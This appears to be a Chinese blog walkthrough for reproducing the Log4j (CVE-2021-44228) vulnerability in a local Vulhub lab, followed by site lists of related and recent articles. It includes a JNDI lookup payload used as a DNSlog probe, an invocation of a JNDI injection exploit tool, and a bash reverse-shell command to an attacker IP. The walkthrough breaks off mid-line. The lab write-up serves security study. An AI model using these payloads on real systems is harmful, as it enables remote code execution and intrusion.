Vulhub 搭建log4j漏洞环境,模拟攻击:

靶机:

首先进入log4j路径

cd vulhub/log4j/CVE-2021-44228/

搭建环境

sudo docker-compose buildsudo docker-compose  up -d

网址输入:http://127.0.0.1:8983/admin/cores

在DNSlog网站生成域名:jkvl0r.dnslog.cn

输入http://127.0.0.1:8983/admin/cores?action=${jndi:ldap://${sys:java.version}.jkvl0r.dnslog.cn}

可以看到:

可以看到Java的版本被输出,测试具有漏洞

攻击:

应用工具JNDI-Injection-Exploit搭建服务:格式:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "命令" -A "ip(攻击机)"

这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。

接下来要实现反弹shell,可以用命令

 bash -i >& /dev/tcp/192.168.237.128/6666 0>&1

注意“命令”必须经过编码,不然将无法实现

──(root												


											

利用Vulhub复现log4j漏洞相关推荐
	

    
								
  1. Vulhub复现fastison漏洞
		
    目录 Vulhub复现fastison漏洞 0.fastison介绍 1.vulhub靶场安装 2.vulhub把场启动fastjson场景 3.可以用dnslog来测试是否有漏洞 4.攻击机kali ...
    
		
    2. 
						
  2. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
		
    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
    
		
    3. 
						
  3. apache log4j漏洞复现
		
    文章目录 1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) 利用条件 利用 2. CVE-2019-17571 利用条件 利用 3. apache lo ...
    
		
    4. 
						
  4. Log4j 漏洞复现
		
    漏洞说明: 前端时间 出现这个漏洞,各大公司 安全部都去做相应的防护和修复措施,网上公开漏洞 poc 源码很少,只听到有,但是不知道怎么复现,于是在github 上搜索找了很多的源码,都不能复现.因为 ...
    
		
    5. 
						
  5. 利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
		
    Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396) Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 Vulnhub官方复现教程 http ...
    
		
    6. 
						
  6. OpenShift Security (13) - 利用Log4j漏洞攻击容器
		
    <OpenShift 4.x HOL教程汇总> 演示视频 利用 Log4j 漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j.2)带有"JNDI 注入& ...
    
		
    7. 
						
  7. SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
		
    SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...
    
		
    8. 
						
  8. PHP文件包含漏洞(利用phpinfo)复现
		
    漏洞简介: PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来拿到权限.因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获取临时文件名 ...
    
		
    9. 
						
  9. 网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
		
    起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御 受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务 受影响用户: 任何使用Log4j的具备该漏洞版本的组织 影响: 远程攻击 ...
    
		
    10. 
		


					

最新文章
	

    
						
  1. Ubuntu 14.04 64位上安装wps office软件
		
    2. 
						
  2. 谈谈Team Foundation Server Proxy
		
    3. 
						
  3. 【今日互联网大事儿】聚美市值缩水一半
		
    4. 
						
  4. 浏览器窗口的高度和宽度
		
    5. 
						
  5. C/C++中 static 的作用
		
    6. 
						
  6. html清楚css的影响,08、清除浮动的影响.html
		
    7. 
						
  7. 用excel数据写入html,如何使用epplus将我的html表格写入excel文件
		
    8. 
						
  8. WCF测试工具,post经验
		
    9. 
						
  9. Angular通过CORS实现跨域方案
		
    10. 
						
  10. matlab图像处理宝典 秦襄培,秦襄培
		
    11. 
						
  11. 关于ODBC使用SQL语句和调用存储过程传递参数的使用方式说明
		
    12. 
						
  12. ubuntu docker-compose: command not found
		
    13. 
						
  13. 清空上传控件HtmlInputFile的方法
		
    14. 
						
  14. 廖雪峰python3复习总结——day2-1
		
    15. 
						
  15. 计算机一级考试wps教程视频教程,全国计算机等级考试一级WPS Office教程(2008年版)...
		
    16. 
						
  16. android 单机地图,天地图app下载
		
    17. 
						
  17. win7计算机无法远程桌面连接,解决win7无法被远程桌面连接教程
		
    18. 
						
  18. 模块度Q——复杂网络社区划分评价标准
		
    19. 
						
  19. 第五篇  《小强升职记》
		
    20. 
						
  20. iOS开发之第三方登录微信-- 史上最全最新第三方登录微信方式实现
		
    21. 
		

	


热门文章
	

    
									
  1. 谷歌Coral USB加速器
			
    2. 
						
  2. Leaving Auction-一道就考set特性的题目
			
    3. 
						
  3. 使用Spyder2 Express校色仪对屏幕进行校色
			
    4. 
						
  4. Vue中的脚手架指的是什么?
			
    5. 
						
  5. IE6、IE7、IE8、IE9兼容性问题解决办法
			
    6. 
						
  6. js 动态调用 applet 内的方法
			
    7. 
						
  7. mybatis批量入库
			
    8. 
						
  8. 对比文本 python学习 工具类代码
			
    9. 
						
  9. 西北师大计算机复试英语,西北师范英语语言文学英美文学复试
			
    10. 
						
  10. redis/ae总结
			
    11.